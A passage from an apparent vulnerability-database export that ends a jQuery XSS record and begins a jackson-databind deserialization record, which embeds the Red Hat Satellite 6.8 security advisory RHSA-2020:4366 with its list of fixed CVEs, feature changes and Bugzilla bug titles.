"url": "https://nvd.nist.gov/vuln/detail/cve-2020-8203"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12666"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:3369"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-12666"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-163560"
},
{
"db": "VULMON",
"id": "CVE-2020-11023"
},
{
"db": "PACKETSTORM",
"id": "164887"
},
{
"db": "PACKETSTORM",
"id": "171212"
},
{
"db": "PACKETSTORM",
"id": "170819"
},
{
"db": "PACKETSTORM",
"id": "170823"
},
{
"db": "PACKETSTORM",
"id": "159727"
},
{
"db": "PACKETSTORM",
"id": "158797"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-005056"
},
{
"db": "NVD",
"id": "CVE-2020-11023"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-163560",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2020-11023",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "164887",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "171212",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170819",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170823",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159727",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "158797",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2020-005056",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2020-11023",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2020-04-29T00:00:00",
"db": "VULHUB",
"id": "VHN-163560",
"ident": null
},
{
"date": "2020-04-29T00:00:00",
"db": "VULMON",
"id": "CVE-2020-11023",
"ident": null
},
{
"date": "2021-11-10T17:12:43",
"db": "PACKETSTORM",
"id": "164887",
"ident": null
},
{
"date": "2023-03-02T15:19:19",
"db": "PACKETSTORM",
"id": "171212",
"ident": null
},
{
"date": "2023-01-31T17:19:24",
"db": "PACKETSTORM",
"id": "170819",
"ident": null
},
{
"date": "2023-01-31T17:26:38",
"db": "PACKETSTORM",
"id": "170823",
"ident": null
},
{
"date": "2020-10-27T16:59:02",
"db": "PACKETSTORM",
"id": "159727",
"ident": null
},
{
"date": "2020-08-07T18:27:30",
"db": "PACKETSTORM",
"id": "158797",
"ident": null
},
{
"date": "2020-06-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-005056",
"ident": null
},
{
"date": "2020-04-29T21:15:11.743000",
"db": "NVD",
"id": "CVE-2020-11023",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2023-02-03T00:00:00",
"db": "VULHUB",
"id": "VHN-163560",
"ident": null
},
{
"date": "2023-11-07T00:00:00",
"db": "VULMON",
"id": "CVE-2020-11023",
"ident": null
},
{
"date": "2025-07-24T05:27:00",
"db": "JVNDB",
"id": "JVNDB-2020-005056",
"ident": null
},
{
"date": "2025-11-07T19:32:52.023000",
"db": "NVD",
"id": "CVE-2020-11023",
"ident": null
}
]
},
"title": {
"_id": null,
"data": "jQuery\u00a0 Cross-site scripting vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-005056"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "code execution, xss",
"sources": [
{
"db": "PACKETSTORM",
"id": "164887"
},
{
"db": "PACKETSTORM",
"id": "171212"
},
{
"db": "PACKETSTORM",
"id": "170819"
},
{
"db": "PACKETSTORM",
"id": "170823"
},
{
"db": "PACKETSTORM",
"id": "159727"
}
],
"trust": 0.5
}
}
VAR-202003-1782
Vulnerability from variot - Updated: 2026-03-09 22:13FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to br.com.anteros.dbcp.AnterosDBCPConfig (aka anteros-core). FasterXML Jackson is a data processing tool for Java developed by American FasterXML Company. jackson-databind is one of the components with data binding function. A security vulnerability exists in FasterXML jackson-databind 2.x versions prior to 2.9.10.4. An attacker could exploit this vulnerability to execute arbitrary code with a specially crafted request. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Important: Satellite 6.8 release Advisory ID: RHSA-2020:4366-01 Product: Red Hat Satellite 6 Advisory URL: https://access.redhat.com/errata/RHSA-2020:4366 Issue date: 2020-10-27 CVE Names: CVE-2018-3258 CVE-2018-11751 CVE-2019-12781 CVE-2019-16782 CVE-2020-5216 CVE-2020-5217 CVE-2020-5267 CVE-2020-7238 CVE-2020-7663 CVE-2020-7942 CVE-2020-7943 CVE-2020-8161 CVE-2020-8184 CVE-2020-8840 CVE-2020-9546 CVE-2020-9547 CVE-2020-9548 CVE-2020-10693 CVE-2020-10968 CVE-2020-10969 CVE-2020-11619 CVE-2020-14061 CVE-2020-14062 CVE-2020-14195 CVE-2020-14334 CVE-2020-14380 ==================================================================== 1. Summary:
An update is now available for Red Hat Satellite 6.8 for RHEL 7.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Satellite 6.7 - noarch, x86_64 Red Hat Satellite Capsule 6.8 - noarch, x86_64
- Description:
Red Hat Satellite is a systems management tool for Linux-based infrastructure. It allows for provisioning, remote management, and monitoring of multiple Linux deployments with a single centralized tool.
Security Fix(es):
- mysql-connector-java: Connector/J unspecified vulnerability (CPU October 2018) (CVE-2018-3258)
- netty: HTTP Request Smuggling due to Transfer-Encoding whitespace mishandling (CVE-2020-7238)
- rubygem-websocket-extensions: ReDoS vulnerability in Sec-WebSocket-Extensions parser (CVE-2020-7663)
- puppet: puppet server and puppetDB may leak sensitive information via metrics API (CVE-2020-7943)
- jackson-databind: multiple serialization gadgets (CVE-2020-8840 CVE-2020-9546 CVE-2020-9547 CVE-2020-9548 CVE-2020-10968 CVE-2020-10969 CVE-2020-11619 CVE-2020-14061 CVE-2020-14062 CVE-2020-14195)
- foreman: unauthorized cache read on RPM-based installations through local user (CVE-2020-14334)
- Satellite: Local user impersonation by Single sign-on (SSO) user leads to account takeover (CVE-2020-14380)
- Django: Incorrect HTTP detection with reverse-proxy connecting via HTTPS (CVE-2019-12781)
- rubygem-rack: hijack sessions by using timing attacks targeting the session id (CVE-2019-16782)
- rubygem-secure_headers: limited header injection when using dynamic overrides with user input (CVE-2020-5216)
- rubygem-secure_headers: directive injection when using dynamic overrides with user input (CVE-2020-5217)
- rubygem-actionview: views that use the
jorescape_javascriptmethods are susceptible to XSS attacks (CVE-2020-5267) - puppet: Arbitrary catalog retrieval (CVE-2020-7942)
- rubygem-rack: directory traversal in Rack::Directory (CVE-2020-8161)
- rubygem-rack: percent-encoded cookies can be used to overwrite existing prefixed cookie names (CVE-2020-8184)
- hibernate-validator: Improper input validation in the interpolation of constraint error messages (CVE-2020-10693)
- puppet-agent: Puppet Agent does not properly verify SSL connection when downloading a CRL (CVE-2018-11751)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Additional Changes:
-
Provides the Satellite Ansible Modules that allow for full automation of your Satellite configuration and deployment.
-
Adds ability to install Satellite and Capsules and manage hosts in a IPv6 network environment
-
Ansible based Capsule Upgrade automation: Ability to centrally upgrade all of your Capsule servers with a single job execution.
-
Platform upgrades to Postgres 12, Ansible 2.9, Ruby on Rails and latest version of Puppet
-
Support for HTTP UEFI provisioning
-
Support for CAC card authentication with Keycloak integration
-
Add ability to upgrade Red Hat Enterprise Linux 7 hosts to version 8 using the LEAPP based tooling.
-
Support for Red Hat Enterprise Linux Traces integration
-
satellite-maintain & foreman-maintain are now self updating
-
Notifications in the UI to warn users when subscriptions are expiring.
The items above are not a complete list of changes. This update also fixes several bugs and adds various enhancements. Documentation for these changes is available from the Release Notes document linked to in the References section.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1160344 - [RFE] Satellite support for cname as alternate cname for satellite server
1261802 - [RFE] Make the foreman bootdisk full-host image work on UEFI systems
1300211 - capsule-certs-generate failed to increment release number when generating certificate rpm for foreman-proxy
1332702 - smart-proxy-openscap-send with additional features - alert if file corrupt
1398317 - For the vms built by Satellite 6 using "Network Based" installation mode on VMWare, unable to change the boot sequence via BIOS
1410616 - [RFE] Prominent notification of expiring subscriptions.
1410916 - Should only be able to add repositories you have access to
1429033 - Host provisioned with RHEL Workstation OS, after provisioning displayed as generic RedHat 7.3
1461781 - [RFE]A button should be available in the GUI to clear the recurring logics.
1469267 - need updated rubygem-rake
1486446 - Content view versions list has slow query for package count
1486696 - 'hammer host update' removes existing host parameters
1494180 - Sorting by network address for subnet doesn't work properly
1501499 - tomcat listens to 0.0.0.0 for serving requests but just needs localhost
1503037 - [RFE] Cancelled future/recurring job invocations should not get the status "failed" but rather "cancelled"
1505842 - Remote Execution engine: Error initializing command: Net::SSH::HostKeyMismatch - fingerprint 20:a9:b7:45:1a:b7:d6:42:1e:03:d1:1f:06:20:4c:e2 does not match for "172.17.0.101"
1531674 - Operating System Templates are ordered inconsistently in UI.
1537320 - [RFE] Support for Capsules at 1 version lower than Satellite
1543316 - Satellite 6.2 Upgrade Fails with error "rake aborted! NoMethodError: undefined method first' for nil:NilClass" when there are custom bookmarks created
1563270 - Sync status information is lost after cleaning up old tasks related to sync.
1569324 - Webrick is unable to use 2 supported TLS v1.2 ciphers ('ECDHE-RSA-AES128-GCM-SHA256', 'ECDHE-RSA-AES256-GCM-SHA384')
1571907 - Passenger threads throwing tracebacks on API jobs after spawning
1576859 - [RFE] Implement automatic assigning subnets through data provided by facter
1584184 - [RFE] The locked template is getting overridden by default
1601101 - [RFE] Add autofill functionality to the Job invocation Search query box, copy from Hosts search box
1607706 - [RFE] Add support for --vlanid in Satellite Kickstart Default provisioning template
1608001 - Rearrange search/filter options on Red Hat Repositories page.
1613391 - race condition on removing multiple organizations simultaneously
1619274 - [RFE] Red Hat Satellite should now be able to discover and provision bare metal machines via UEFI HTTP boot
1619422 - User Agent for Downstream RSS feed still says Foreman and Foreman Version
1620214 - Page should auto-refresh after subscriptions have been modified on the Satellite webui
1624049 - Changing the organization in the Satellite WebUI does not change the sync plan page information from the previous organization
1625258 - Having empty "Allocation (GB)" when creating a new Host, nil:NilClass returned on creating the Host
1627066 - Unable to revert to the original version of the provisioning template
1630433 - [RFE] Include Ansible Satellite modules with Ansible Core modules
1630536 - yum repos password stored as cleartext
1632577 - Audit log show 'missing' for adding/removing repository to a CV
1640615 - CVE-2018-3258 mysql-connector-java: Connector/J unspecified vulnerability (CPU October 2018)
1645062 - host_collection controller responds with 200 instead of 201 to a POST request
1645749 - repositories controller responds with 200 instead of 201 to a POST request
1647216 - Lack of edit_smart_proxies permission causes error when setting host to Build
1647364 - [RFE] Extend the audits by the http request id
1647781 - Audits contain no data (Added foo to Missing(ID: x))
1651297 - Very slow query when using facts on user roles as filters
1653217 - [RFE] More evocative name for Play Ansible Roles option?
1654347 - Satellite may create duplicate CreateRssNotifications tasks after restarting foreman tasks
1654375 - [RFE] Mention specifically uder the admin chexbox for AD LDAP user if its created with admin role,
1659418 - katello-tracer-upload failing with error "ImportError: No module named katello"
1665277 - subscription manager register activation key with special character failed
1665893 - candlepin refuses to start or hangs periodically when having too many messages in ActiveMQ journal
1666693 - Command "hammer subscription list" is not correctly showing the comment "Guests of " in the "Type" field in the output.
1677907 - Ansible API endpoints return 404
1680157 - [RFE] Puppet 'package' provider type does not support selecting modularity streams
1680458 - Locked Report Templates are getting removed.
1680567 - Reporting Engine API to list report template per organization/location returns 404 error
1681619 - [RFE] Disable the option to enter a MAC address after selecting a compute resource while creating new hosts through Satellite
1685949 - [RFE] Support passing of attribute name instead of Id's in RHV workflow
1687116 - kernel version checks should not use /lib/modules to determine running version
1688886 - subscription-manager not attaching the right quantity per the cpu core
1691416 - Delays when many clients upload tracer data simultaneously
1697476 - [RFE] To be able to see the name of the provisioning template being used to build a host from the host itself
1702434 - foreman-bootloaders-redhat-tftpboot expected file permissions in package don't match runtime permissions
1705097 - An empty report file doesn't show any headers
1709557 - [RFE] warn the user if they have done a select all and it includes the restart|reboot service
1709842 - Tracer shows the machines needs rebooting even after reboot if kernel-debug is installed
1710511 - Filter by os_minor includes unexpected values on the Satellite web UI.
1715999 - Use Infoblox API for DNS conflict check and not system resolver
1716423 - Nonexistent quota can be set
1717403 - Broken breadcrumbs link to compute resource VM list on VM detail page
1718012 - [RFE] Add a hard limit of 100 items to restrict any fact child-hash/array
1718954 - [RFE] When the contentAccessMode is set to org_environment for an owner, we should disable auto-attach globally
1719509 - [RFE] "hammer host list" including erratas information
1719516 - [RFE] "hammer host-collection hosts" including erratas information
1720725 - [RFE] Ability to override DHCP options and wait_after_restart option for race condition
1721419 - SSH key cannot be added when FIPS enabled
1722954 - Slow performance when running "hammer host list" with a high number of Content Hosts (15k+ for example)
1723313 - foreman_tasks:cleanup description contain inconsistent information
1724494 - [Capsule][smart_proxy_dynflow_core] "PID file /var/run/foreman-proxy/smart_proxy_dynflow_core.pid not readable (yet?) after start"
1724497 - CVE-2019-12781 Django: Incorrect HTTP detection with reverse-proxy connecting via HTTPS
1726768 - [RFE] Red Hat Satellite 6 GUI, Tasks should show Full name
1729968 - Editing disk size of a Compute Profile for a VMware Compute Resource makes the whole Storage section disappear
1730083 - [RFE] Add Jobs button to host detail page
1731155 - Cloud init template missing snippet compared to Kickstart default user data
1731229 - podman search against Red Hat Satellite 6 fails.
1731235 - [RFE] Create Report Template to list inactive hosts
1733241 - [RFE] hammer does not inherit parent location information
1733650 - Satellite receives RPM1004 pulp error and 403 Forbidden http error retrieving packages from CDN
1736809 - undefined methodsplit' for nil:NilClass when viewing the host info with hammer
1737135 - Content Hosts loses subscriptions after Vmotion and auto attach is unable to assigned the subscriptions if any other subscription is already attached to the host.
1737564 - [RFE] Support custom images on Azure
1738548 - Parameter --openscap-proxy-id is missing in hammer host create command.
1740943 - Increasing Ansible verbosity level does not increase the verbosity of output
1743056 - While creating a host for a particular location, all the domains are in the pull down list, even if only one domain is selected for that location.
1743776 - Error while deleting the content view version.
1745516 - Multiple duplicate index entries are present in candlepin database
1746936 - satellite6 is not using remote execution by default even after setting remote execution by default from satellite web-UI.
1749692 - Default Rhel8 scap content does not get populated on the Satellite
1749916 - [RFE] Satellite should support certificates with > 2048 Key size
1751981 - Parent object properties are not propagated to Child objects in Location and Host Group
1752880 - katello-host-tools-tracer stats paths abusively, leading to a hang or slowness of yum command
1753551 - Traces output from Satellite GUI has mismatches with client tracer output
1756991 - 2 inputs with same name -> uninitialized constant #::NonUniqueInputsError
1757317 - [RFE] Dynflow workers extraction
1757394 - [BUG] Non-admin users always get "Missing one of the required permissions" message while accessing their own table_preferences via Satellite 6 API
1759160 - Rake task for cleaning up DHCP records on proxy
1761872 - Disabled buttons are still working
1763178 - [RFE] Unnecessary call to userhelp and therefore log entries
1763816 - [RFE] Report which users access the API
1766613 - Fact search bar broken and resets to only searching hostname
1766906 - Associating more than 10 Ansible roles to a Host only sets based on the per-page setting
1767497 - Compute Resource filter does not correctly allow Refresh Cache
1767635 - [RFE] Enable Organization and Location to be entered not just selected
1770366 - [RFE] Improve upgrade efficiency by moving RPM post-installation scripts to the installer.
1770544 - Puppet run job notification do not populate "%{puppet_options}"' value
1770777 - Changing concurrency level while executing Ansible jobs fail with NoMethodError: undefined method []' for nil:NilClass
1771367 - undefined methodrequest_uri' when Openidc Provider Token Endpoint is none
1771428 - Openscap documentation link on Satellite 6 webui is broke
1771484 - Client side documentation links are not branded
1771693 - 'Deployed on' parameter is not listed in API output
1772381 - Incorrect example to use multiple attributes as a matcher key in the tooltip for Order
1772517 - login with the user name as same as existing user group gives 500 ISE and wont allow user to login again
1772544 - Use APIv4 is not the default when creating a new compute resource in ovirt
1773298 - GET /katello/api/srpms/compare always fails with error: Missing template katello/api/v2/common/compare
1774710 - UI: When selecting the server type in ldap authentication, "attribute mappings" fields could be populated automatically
1778396 - exporting/importing report template process is causing a different report during the visualization (blank lines)
1778503 - Prepended text on OS name creation
1778681 - Some pages are missing title in html head
1779638 - Unable to filter/search http-proxies using Organization/Location for Satellite UI.
1781671 - While using concurrency_level in remote execution, job progress in WebUI is not being updated properly
1782352 - [RHEL 8.1 client] All packages are not getting updated after click on "Update All Packages"
1782426 - Viewing errata from a repository returns incorrect unfiltered results
1783568 - [RFE] - Bulk Tracer Remediation
1783882 - Ldap refresh failed with "Validation failed: Adding would cause a cycle!"
1784012 - Default kickstart places log to /mnt/sysimage/root/install.post.log
1784341 - disable CertificateRevocationListTask job in candlepin.conf by default
1785117 - [RFE] Add functionality in foreman logging to hash-out or mark as [FILTERED] the password in /var/log/foreman-maintain/foreman-maintain.log and /var/log/foreman-installer/satellite.log file
1785231 - Ansible Variable override to false does not gets reflected on client machine on Red Hat Satellite 6.
1785624 - [UI] Importing templates with associate 'never' is not resulting as expected
1785683 - Does not load datacenter when multiple compute resources are created for same VCenter
1785902 - Ansible RunHostJob tasks failed with "Failed to initialize: NoMethodError - undefined method []' for nil:NilClass"
1785940 - [RFE] Reporting template should allow host filtering based on applicable errata issue date
1787329 - change filename in initrd live CPIO archive to fdi.iso
1788261 - CVE-2018-11751 puppet-agent: Puppet Agent does not properly verify SSL connection when downloading a CRL
1788958 - [RFE] add "elapsed time" column to export and hammer, make it filterable in WebUI
1789006 - Smart proxy dynflow core listens on 0.0.0.0
1789100 - CVE-2019-16782 rubygem-rack: hijack sessions by using timing attacks targeting the session id
1789434 - Template editor not always allows refreshing of the preview pane
1789522 - On unhealthy Satellite, dynflow_envelopes table might grow indefinitely
1789686 - Non-admin user with enough permissions can't generate report of applicable errata
1789815 - The "start" parameter should be mentioned inside "--compute-attributes:" in hammer_cli for Satellite 6
1789911 - "foreman-rake katello:publish_unpublished_repositories" is referring to column which no longer exists in katello_repositories table.
1789924 - [RFE] As user I want to see a "disabled" status for Simple Content Access (Golden Ticketed) Orgs
1791654 - drop config_templates api endpoints and parameters
1791656 - drop deprecated host status endpoint
1791658 - drop reports api endpoint
1791659 - Removeuse_puppet_defaultapi params
1791663 - remove deprecated permissions api parameters
1791665 - drop deprecated compute resource uuid parameter
1792131 - [UI] Could not specify organization/location for users that come from keycloak
1792135 - Not able to login again if session expired from keycloak
1792174 - [RFE] Subscription report template
1792304 - When generating custom report, leave output format field empty
1792378 - [RFE] Long role names are cut off in the roles UI
1793951 - [RFE] Display request UUID on audits page
1794015 - When using boot disk based provisioning, sometimes foreman tries to recreate folder foreman_isos in the datastore even when the folder already exists
1794346 - Change the label for the flashing eye icon during user impersonation
1794641 - Sync status page's content are not being displayed properly.
1795809 - HTML tags visible on paused task page
1796155 - [RFE] host_collections not available in reporting engine unless safe mode disabled
1796205 - iso upload: correctly check if upload directory exists
1796225 - CVE-2020-7238 netty: HTTP Request Smuggling due to Transfer-Encoding whitespace mishandling
1796259 - loading subscriptions page is very slow
1796697 - Unable to list/enable EUS repositories on the RHEL clients registered in the satellite server with org_environment contentAccessMode
1798489 - [RHSSO] - If Access Token Lifespan is set to 5 mins then the user is getting sign out instead after idle SSO timeout
1798668 - Configure default MongoDB WiredTiger cache to be 20% of RAM in the Satellite server
1799480 - CLI - hammer repository info shows blank sync status if the repository sync is in warning/error state.
1800503 - In Hammer, it is not possible to set default keyboard layout for a RHEV host
1801264 - CVE-2020-5217 rubygem-secure_headers: directive injection when using dynamic overrides with user input
1801286 - CVE-2020-5216 rubygem-secure_headers: limited header injection when using dynamic overrides with user input
1802529 - Repository sync in tasks page shows percentage in 17 decimal points
1802631 - Importing Ansible variables yields NoMethodError: undefined methodmap' for nil:NilClass (initialize_variables) [variables_importer.rb]
1803846 - Red Hat Insights Risk Summary shows systems at risk while there are none
1804496 - While performing bulk actions, unable to select all tasks under Monitor --> Tasks page.
1804651 - Missing information about "Create Capsule" via webUI
1805501 - CVE-2020-10693 hibernate-validator: Improper input validation in the interpolation of constraint error messages
1805727 - Default Custom Repository download policy setting refers to old name (Default Repository download policy) in satellite 6.7
1806713 - hypervisor checkin fails with cp_consumer_hypervisor_ukey error
1806842 - Disabling dynflow_enable_console from setting should hide "Dynflow console" in Tasks
1806897 - Red Hat Inventory Uploads fail with NoMethodError: undefined method mtu'
1807042 - [RFE] Support additional disks for VM on Azure Compute Resource
1807321 - A non-admin users with view recurring_logics permissions are unable to list recurring logics.
1807829 - Generated inventory file doesn't exist
1807946 - Multiple duplicate index entries are present in foreman database
1808843 - Satellite lists unrelated RHV storage domains using v4 API
1810250 - Unable to delete repository - Content with ID could not be found
1810549 - dropping packets to qdrouterd triggers a memory leak in qpid-proton 0.28.0-2 libraries used by goferd
1810774 - Applying errata via Host Collection the errata are trying to be applied to all hosts associated with the host collection
1811390 - Links to an errata list of a repository lack repositoryId in URI and points to generic "errata" page instead
1812031 - Improve regenerate applicability tasks performance by querying NEVRA only data from repo_content_units
1812858 - Satellite Inventory Plugin does not appear to make reports which match yupana's API specification
1812904 - 'Hypervisors' task fails with 'undefined method[]' for nil:NilClass' error
1813005 - Prevent --tuning option to be applied in Capsule servers
1813313 - [Tracker] Test HTTP UEFI on IPv6 (QA only tracker)
1814095 - Applicable errata not showing up for module stream errata
1815104 - Locked provisioning template should not be allowed to add audit comment
1815135 - hammer does not support description for custom repositories
1815146 - Backslash escapes when downloading a JSON-formatted report multiple times
1815608 - Content Hosts has Access to Content View from Different Organization
1816330 - CVE-2020-8840 jackson-databind: Lacks certain xbean-reflect/JNDI blocking
1816332 - CVE-2020-9546 jackson-databind: Serialization gadgets in shaded-hikari-config
1816337 - CVE-2020-9547 jackson-databind: Serialization gadgets in ibatis-sqlmap
1816340 - CVE-2020-9548 jackson-databind: Serialization gadgets in anteros-core
1816699 - Satellite Receptor Installer role can miss accounts under certain conditions
1816720 - CVE-2020-7942 puppet: Arbitrary catalog retrieval
1816853 - Report generated by Red Hat Inventory Uploads is empty.
1817215 - Admin must be able to provide all the client ids involved inside Satellite settings.
1817224 - Loading one org's content view when switching to a different org
1817481 - Plugin does not set page
1817728 - Default task polling is too frequent at scale
1817874 - After data upload from satellite UI it is not visible on cloud.redhat.com.
1818062 - Deprecated message about katello agent being shown on content host registration page
1818816 - Web console should open in a new tab/window
1819145 - [RFE] Incorporate apipie-dsl to document template macros, provided as one-time generated HTML document
1819208 - CVE-2020-10968 jackson-databind: Serialization gadgets in org.aoju.bus.proxy.provider..RmiProvider
1819212 - CVE-2020-10969 jackson-databind: Serialization gadgets in javax.swing.JEditorPane
1820193 - Deleted Global Http Proxy is still being used during repository sync.
1820245 - reports in JSON format can't handle unicode characters
1821182 - [Repository] - Packages are not getting synced with rpm-with-sha-512
1821335 - Inventory plugin captures information for systems with any entitlement
1821457 - [RFE] Capsules shouldn't update hosts' "Registered through" facts on the Satellite server in a load-balanced configuration.
1821629 - Eager zero seems to do nothing
1821651 - Manifest import task progress remains at 0.
1821752 - New version of the plugin is available: 1.0.5
1822039 - Get HTTP error when deploying the virt-who configure plugin
1822560 - Unable to sync large openshift docker repos
1823905 - Update distributor version to sat-6.7
1823991 - [RFE] Add a more performant way to sort reports
1824183 - Virtual host get counted as physical hosts on cloud.redhat.com
1824931 - After upgrading to Satellite 6.7 the Tasks page in WebUI goes "Blank"
1825760 - schedule inventory plugin sync failed due to 'organization_id' typecasting issue.
1825930 - [Regression] RedHat Insights client proxying stopped working due to missing proxy
1825978 - Manifest refresh failed with 'Katello::Errors::CandlepinError Invalid credentials.' error
1826298 - even when I cancel ReX job, remediation still shows it as running
1826340 - [RFE] Ability to provision a VM using Red Hat Gold BYOS images
1826515 - [RFE] Consume Candlepin events via STOMP
1826625 - Improve performance of externalNodes
1826678 - New version of the plugin is available: 2.0.6
1826734 - Tasks uses wrong controller name for bookmarks
1826805 - CVE-2020-11619 jackson-databind: Serialization gadgets in org.springframework:spring-aop
1827389 - Manifest import and delete calls Actions::Pulp::Repository::Refresh for non-Library repositories
1827583 - Installing dhcp_isc and dhcp_remote_isc fails with "You cannot specify the same gem twice with different version requirements.....You specified: rsec (< 1) and rsec (>= 0)"
1828257 - Receptor init file missing [Install] section, receptor service won't run after restart
1828486 - CVE-2020-7943 puppet: puppet server and puppetDB may leak sensitive information via metrics API
1828549 - Manifest Certificate Exposed by Unprivileged User
1828682 - Create compute resource shows console error 'Cannot read property 'aDataSort' of undefined'
1828789 - [RFE] Satellite installer should support installing the Satellite Inventory Provider by default
1828868 - Add keep alive option in Receptor node
1829487 - Ansible verbosity level does not work
1829766 - undefined method tr' for nil:NilClass when trying to get a new DHCP lease from infoblox
1830253 - Default job templates are not locked
1830403 - Capsule sync fails when promoting a content view to more than one lifecyle env at the same time
1830834 - Unable to update default value of a smart class parameter (Sql query error).
1830860 - Refactor loading regions based on subscription dynamically
1830882 - Red Hat Satellite brand icon is missing
1830884 - bootstrap.py script tries to yum install puppet package that is not in rhel-7-server-satellite-tools-6.7-rpms repo
1831528 - CVE-2020-5267 rubygem-actionview: views that use thejorescape_javascriptmethods are susceptible to XSS attacks
1833031 - Improve RH account ID fetching in cloud connector playbook
1833035 - Add remediation bulk ack message (i.e. all hosts for a given run has finished)
1833039 - Introduce error code to playbook_run_finished response type
1833311 - "Failed to save: Failed to save when overriding parameters for ansible, cause: Default value is invalid" while creating scap policy with ansible deployment option.
1834302 - --enable-foreman-plugin-rh-cloud fails: Execution of '/bin/yum -d 0 -e 0 -y install tfm-rubygem-foreman_rh_cloud' returned 1: Error: Nothing to do
1834377 - Disable mongo FTDC
1834866 - Missing macro for "registered_at" host subscription facet
1834898 - Login Page background got centralized and cropped
1835189 - Missing macro for "host_redhat_subscriptions" in host subscription facet
1835241 - Some applicability of the consumers are not recalculated after syncing a repository
1835882 - While executing "Configure Cloud Connector" playbook on Satellite 6.7 server it does not honour HTTP Proxy setting
1836155 - Support follow on rails, travis and i18n work for AzureRm plugin
1836771 - In satellite installation summary report, satellite should be mentioned instead of foreman.
1836774 - Some foreman services failed to start (pulp_streamer)
1836845 - "Generate at" in report template should be current date
1837951 - "invalid Unicode Property \p: /\b\perform various actions through those proxies\b(?!-)/" warning messages appears in dynflow-sidekiq@worker-hosts-queue
1838160 - 'Registered hosts' report does not list kernel release for rhsm clients
1838191 - Arrow position is on left rather in the middle under "Start Time"
1838281 - CVE-2020-8161 rubygem-rack: directory traversal in Rack::Directory
1838917 - Repositories are not showing their available Release versions due to a low default db pool size
1838963 - Hypervisors from Satellite, never makes their way to HBI
1838965 - Product name link is not working on the activation keys "Repository Sets" tab.
1839025 - Configure Cloud Connector relies on information which is no longer provided by the API
1839649 - satellite-installer --reset returns a traceback
1839726 - Bring tfm-rubygem-foreman_leapp to downstream builds
1839779 - undefined local variable or methodimplicit_order_column' for # on GET request to /discovery_rules endpoint
1839966 - New version of the plugin is available: 2.0.7
1840166 - ERF42-4995 [Foreman::Exception]: Invalid authenticity token message displayed with traceback, If re-login the machine after session timed-out .
1840191 - Validate parameters passed by receptor to the receptor-satellite plugin
1840218 - ArgumentError: wrong number of arguments
1840525 - Content host list doesn't update after the successful deletion of content host.
1840635 - Proxy has failed to load one or more features (Realm)
1840723 - Selected scenario is DISABLED, can not continue
1840745 - Satellite installation failed with puppet error " No Puppet module parser is installed"
1841098 - Failed to resolve package dependency while doing satellite upgrade.
1841143 - Known hosts key removal may fail hard, preventing host from being provisioned
1841573 - Clicking breadcrumb "Auth Source Ldaps" on Create LDAP Auth Source results in "The page you were looking for doesn't exist."
1841818 - icons missing on /pub download page
1842900 - ERROR! the role 'satellite-receptor' was not found in ...
1842943 - ~foreman-proxy/.ssh is a symlink to /usr/com/foreman-proxy/ssh/
1843406 - In 6.8, Receptor installation playbook's inputs are visible again
1843561 - Report templates duplicated
1843846 - Host - Registered Content Hosts report: "Safemode doesn't allow to access 'report_hraders' on #"
1843867 - Satellite-installer failed with argument error while upgrading the satellite from 6.7 to 6.8
1843926 - satellite-change-hostname fails when running nsupdate
1844142 - [RFE] Drop a subsription-manager fact with the satellite version
1845112 - Installer deploys outdated version of pxegrub2 mac template to TFTP
1845486 - [RFE] Able to select 'HTTP Proxy' during Compute Resource create for 'GCE' as similar to EC2
1845860 - hammer org add-provisioning-template command returns Error: undefined method []' for nil:NilClass
1845978 - CVE-2020-7663 rubygem-websocket-extensions: ReDoS vulnerability in Sec-WebSocket-Extensions parser
1846254 - need to restart services after enabling leapp plugin
1846313 - Add index on locks for resource type and task id
1846317 - undefined methodklass' for nil:NilClass
1846421 - build pxe default do not work when more than 1 provider
1846593 - Satellite-installer failed with error "Could not find a suitable provider for foreman_smartproxy" while doing upgrade from 6.7 to 6.8
1847019 - Empty applicability for non-modular repos
1847063 - Slow manifest import and/or refresh
1847407 - load_pools macro not in list of macros
1847645 - Allow override of Katello's DISTRIBUTOR_VERSION
1847784 - Error updating system data on the server, see /var/log/rhsm/rhsm.log for more details.
1847840 - Libvirt note link leads to 404
1847871 - Combined Profile Update: ArgumentError: invalid argument: nil.
1848291 - Download kernel/initram for kexec asynchronously
1848535 - Unable to create a pure IPv6 host
1848538 - Failed to resolve the packages due to tfm-runtime package dependency in fm-upgrade(6.7 to 6.8)
1848902 - ERF42-0258 [Foreman::Exception]: is not valid, enter id or name
1848958 - CVE-2020-14195 jackson-databind: serialization in org.jsecurity.realm.jndi.JndiRealmFactory
1848962 - CVE-2020-14062 jackson-databind: serialization in com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool
1848966 - CVE-2020-14061 jackson-databind: serialization in weblogic/oracle-aqjms
